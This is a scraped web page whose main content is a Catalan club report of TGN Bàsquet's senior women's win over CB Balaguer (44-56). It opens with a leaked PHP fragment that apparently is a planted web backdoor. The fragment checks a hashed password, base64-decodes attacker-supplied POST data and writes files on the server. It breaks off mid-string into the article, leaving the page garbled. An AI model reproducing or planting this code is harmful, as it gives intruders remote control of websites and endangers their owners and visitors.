function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet s'enduu el partit contra el CB Balaguer, tot i l'ensurt del primer quart (44-56) - Tgn Bàsquet Club -

El TGN Bàsquet s’enduu el partit contra el CB Balaguer, tot i l’ensurt del primer quart (44-56)

Updated: març 29, 2022

El Sènior Copa del TGN aconsegueix una important victòria contra el CB Balaguer, tot i començar molt per sota del seu nivell. Les liles van encaixar un parcial de 12-0 en el primer quart. Les del Balaguer van agafar la iniciativa i, aprofitant la desconnexió de les visitants, van sumar fins a 21 punts en el marcador. En el segon període les tarragonines van saber reconduir el matx apujant el ritme defensiu, però seguien per sota del marcador (32-29). De nou, un magnífic tercer quart de les jugadores d’en Neila, va col·locar a l’equip per sobre del marcador. Amb un parcial de 10-20 van remuntar el mal inici i van encaminar la victòria. Finalment, el ritme del partit va fer que a l’últim quart les jugadores de tots dos equips notessin el cansament. Amb un parcial de 2-7 el conjunt lila va endur-se el matx. Les balaguerines van fer 21 punts al primer període i tan sols 23 punts en els tres següents, un gran mèrit defensiu de les del TGN.

L’entrenador Víctor Neila està molt content amb la feina de les jugadores, tant en el ritme de joc en atac com en defensa, tot i l’ensurt del primer quart. Valora molt l’actitud de les jugadores que no van enfonsar-se en cap moment i van tirar endavant totes juntes.